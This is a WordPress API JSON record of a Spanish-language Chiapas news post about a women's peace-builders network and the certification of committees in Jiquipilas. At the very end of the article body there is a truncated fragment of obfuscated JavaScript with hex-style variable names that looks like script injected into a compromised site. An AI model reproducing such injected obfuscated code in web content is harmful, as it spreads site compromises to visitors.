{"id":1314,"date":"2022-04-13T04:00:34","date_gmt":"2022-04-13T04:00:34","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1314"},"modified":"2022-04-13T04:00:35","modified_gmt":"2022-04-13T04:00:35","slug":"planeacion-equidad-y-desarrollo-sinonimo-de-un-gobierno-incluyente-hugo-lazaro","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1314","title":{"rendered":"Planeacion, equidad y desarrollo, sin\u00f3nimo de un Gobierno incluyente \u201c Hugo L\u00e1zaro"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220412-WA0032-1024x682.jpg\" alt=\"\" class=\"wp-image-1315\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220412-WA0032-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220412-WA0032-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220412-WA0032-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220412-WA0032-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220412-WA0032.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 Se instal\u00f3 la red de mujeres constructoras de paz para reforzar estrategias de empoderamiento femenino.<br>\u2022 el edil Jiquipilteco agradeci\u00f3 el apoyo y respaldo de la Lic. Emma Orantes.<\/p>\n\n\n\n<p>Jiquipilas, Chiapas.- El alcalde C\u00e9sar Hugo Lazaro Rodr\u00edguez atestigu\u00f3 y encabez\u00f3 la instalaci\u00f3n de la red de &#8220;Mujeres constructoras de paz&#8221; e hizo entrega de certificaci\u00f3n a comit\u00e9s de mujeres de los diferentes ejidos del municipio.<\/p>\n\n\n\n<p>La red de mujeres constructoras de paz es un programa social que tiene la objetividad de que en conjunto puedan detectar acciones de violencia y desigualdad hacia la mujer, actuando bajo las normas que la rigen y coadyuvando con instancia que redoblan esfuerzos para un mundo equitativo.<\/p>\n\n\n\n<p>\u201cSiempre he estado a favor de las mujeres, ahora como autoridad me toc\u00f3 impulsar actividades sociales y reforzar las estrategias que garanticen las mismas oportunidades y el respeto hacia ellas; adem\u00e1s estos comit\u00e9s tendr\u00e1n acceso para una mejor planeacion que desarrollen acciones ben\u00e9ficas como salud, econ\u00f3mia y actividades culturales\u201d puntualiz\u00f3 el edil.<\/p>\n\n\n\n<p>La Presidenta del DIF Jiquipilas Madely Montejo Maza hizo menci\u00f3n que respalda cada movimiento femenino en pro de buenas acciones sociales y que en ella encuentran una aliada para garantizar nuevos m\u00e9todos de inclusi\u00f3n y ser portavoces para buscar nuevas uniones con dependencias gubernamentales .<\/p>\n\n\n\n<p>Por su parte Claudia Leon Gordillo, Coordinadora de Vinculacion del Centro Estatal de Prevenci\u00f3n del Delito hizo menci\u00f3n que este es un programa a nivel nacional y que le da orgullo ver la voluntad e inter\u00e9s de las autoridades Jiquipiltecas para coadyuvar y tener certeza y grupos sociales que respalden y apoyen en cada momento a las mujeres.<\/p>\n\n\n\n<p>Para finalizar se hizo entrega de constancias que acreditan de manera formal a los comit\u00e9s de mujeres de los ejidos (Uni\u00f3n agrarista, Vicente Guerrero, Plan de Ayala, Tierra y libertad, Juli\u00e1n Grajales, San Dionicio, Quintana Roo, Luis Espinosa, Palestina, Cuauht\u00e9moc, Triunfo, Hidalgo, Pino Su\u00e1rez, Vicente Guerrero, Baja California, Crist\u00f3bal Colon, Chiapas Nuevo, Michoac\u00e1n, Tiltepec y cabecera municipal) quienes acuerdan cumplir par\u00e1metros sociales y estar presente para aprovechar beneficios.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Se instal\u00f3 la red de mujeres constructoras de paz para reforzar estrategias de empoderamiento femenino.\u2022 el edil Jiquipilteco agradeci\u00f3 el apoyo y respaldo de la Lic. Emma Orantes. Jiquipilas, Chiapas.- El alcalde C\u00e9sar Hugo Lazaro Rodr\u00edguez atestigu\u00f3 y encabez\u00f3 la instalaci\u00f3n de la red de &#8220;Mujeres constructoras de paz&#8221; e hizo entrega de certificaci\u00f3n &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1315,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1314","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1314","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1314"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1314\/revisions"}],"predecessor-version":[{"id":1316,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1314\/revisions\/1316"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1315"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1314"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1314"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1314"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}